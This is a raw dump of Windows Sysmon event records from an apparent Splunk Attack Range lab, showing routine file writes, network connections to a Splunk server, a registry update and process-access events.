AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94C16289897FDFFFA9EFF6A90D6127B6,SHA256=FA94CDF96BF639745766B161E9B686016F241250F1EBECC0D3C82083ED8C602F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:18.509{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:18.209{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B89094D82AF92F8427DE174B3753A420,SHA256=3362ABD0D2D7FC53F0B8A8C63B17F0EE38DC57DC92E3579EFC208667B688EB2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809528Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:17.201{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57405-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809530Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:19.693{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C3E8581E8B001E04D4A850A1015BF90,SHA256=F6C3AA8A41A8C9F3388AC562FA770465CD3DA374B4016C6CE6E6A81C4C5F16E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:19.240{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FCE10E505E3D3E62168E3AF01DBA1B1,SHA256=235ACF49AB91CE567587279DBD75D6E927117A114C176A5C117E11666B2CFCA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809533Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:20.756{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809532Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:20.693{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB0F3D6A9F902D59AD157E732030A1EC,SHA256=54DE15CEFF74FA189D681A666FE19406D2D45805DC5D7B3CAFFE0860F4E37683,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:20.270{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9576549ACE3BA7FC2F0DF291CE63E87D,SHA256=598601F46D395BF4BD3DD486510E032A49886B0F5413FA1D9636900848172C8D,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000809531Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:03:20.584{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f4-0x613784b3) 354300x80000000000000001053049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.720{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61900-false10.0.1.12-8000- 23542300x8000000000000000809534Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:21.709{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CCF591A9D7E23858DA547C8DC692620,SHA256=9B185300113721F7889A87801526EB42A9406F3F93238C444442EEB1CE10E4E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.270{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F665D75D6B9F505B9AAB63A8B1D33C8C,SHA256=ADC3C1995658CBCAF420A2BDF58844CCBB7FA0FA5914BEF2EE66CF6E0E63D4D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=883FF506EE1EA8982D11B9AA623943CF,SHA256=A523A2ACFB90631A198C8FCB81F684B0BDC81F7BE6AE1F0ACDC73BDDE4A7039D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D82473D50F9E85301B19F630E6949976,SHA256=16F43DEFA233CEBB676637F61DF54CAE160A10396BAC135DFAEF1AF119B1E3D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=86098AC3AEE905FB44616B3B72FEF6C8,SHA256=A45540FD5099199F6CD27E1F2B55EEC9609690F9A14DF7A550326A1CA3B91B4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2DD285A60052367A37E65D8FB223D2C9,SHA256=92EF053E06614B79CDE26020E3091D913D61F0A3E3C4F8B8D3FE8B25CEDB9140,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=856F0D1402684BE7D21A6F545F51B1D8,SHA256=C4B8616FA28E47913ED82089FB23502241F8832DD72F8E992DA082BED42AC73B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FBDD9FE28F98BE7F90EF83060D507974,SHA256=C206A41B4024C7F8CC537766F08091B7F185295A08AD42BE1EB8D1C1923BCDD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B77AEFA01AAEE100BEDDE8F53C8F66FC,SHA256=D95EC75990602EA549E86259099ED3945AE39251E88C722C2E000512AF35651D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.191{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1457AE7F2CFED86517EC6D04C6FBF861,SHA256=2012F8A176801EA210D2502E1EA4D0110A00411828EB7799E71FC2CBFA4AEA27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C3D3E8FDAB68E7E8B7E24AB3F450FE24,SHA256=FFFE0FA8B804947E193846CE85D74FD397E59C8FA9F0BE0BFD0AA46FAC5550D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.188{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8582C86CDD825AC8B6566EEBA96408C1,SHA256=6BF029D4A389A7EEACCE9C56BF5BF47FC2D81638A4D0ED7E15164ECC8BAC6969,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.187{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D404F59DC4EAB38E6A1A870F5859E4D7,SHA256=8F9F3B290EBA1AD49602EA65A4E61CACD78A46D963044CBC894028E4C276A4FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809537Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:22.709{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0641421D57BCA1448A9B9D5B38A86F71,SHA256=82981D11AC7F6BAA121E250B6D088095186AA31E1DEFC7C4D87909669E50C336,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:22.289{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8128C512CE05D028E59BFCBC39A9CB4E,SHA256=E07B348B0A80D22D5D4C9186BD20DEB10DC35A4D7F05B3EF24A7F46F62FD8129,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809536Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:20.888{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57406-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000809535Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:20.716{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-623.attackrange.local123ntpfalse169.254.169.123-123ntp 23542300x8000000000000000809539Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:23.724{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C215A885C52C8479F0C26BAAE61A0DE,SHA256=22A431CD7B35C2079F7A17F38A8534B7A68E32AAEDC5E890E2AC661058097225,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:23.806{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=885EA53639B482B89CA8B87293F77C81,SHA256=16D96374D3EB6953615332385FD2CBDF0CB0C61F4B8D3CDF9DEBF53446C8D4E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:23.806{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D01919AC68E1B0526B20873E366DD334,SHA256=5C391053AE50C9BC6085E51193D9637E206BE4D77B1B304A070BD1DD58BA3FF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:23.306{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F612905699B7E09BEB34487D6373B40D,SHA256=B395FDD2E6A2D02CCCB5BB8657B83331DD67A0D2ABF5E7B6E34ABB1D309E5F7F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809538Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:22.247{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57407-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809554Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.725{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D19BC98F4D12392E06B8E2DF3DC6256,SHA256=5663756EEB06B6AF543B1A798C6DDE312BC0DA14822A099B5F2A54A1FD9456B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:24.321{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=258BA3E9537D35341E449594CB1F9BD1,SHA256=FFCA0C89CBCD25F1B4EB07522B864A78F670850929A6CF65509F8D29BB4E4E47,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809553Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.601{0C1E0330-F74C-60EB-C079-00000000D001}37802588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809552Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F74C-60EB-C079-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809551Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809550Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809549Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809548Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809547Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809546Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809545Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809544Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 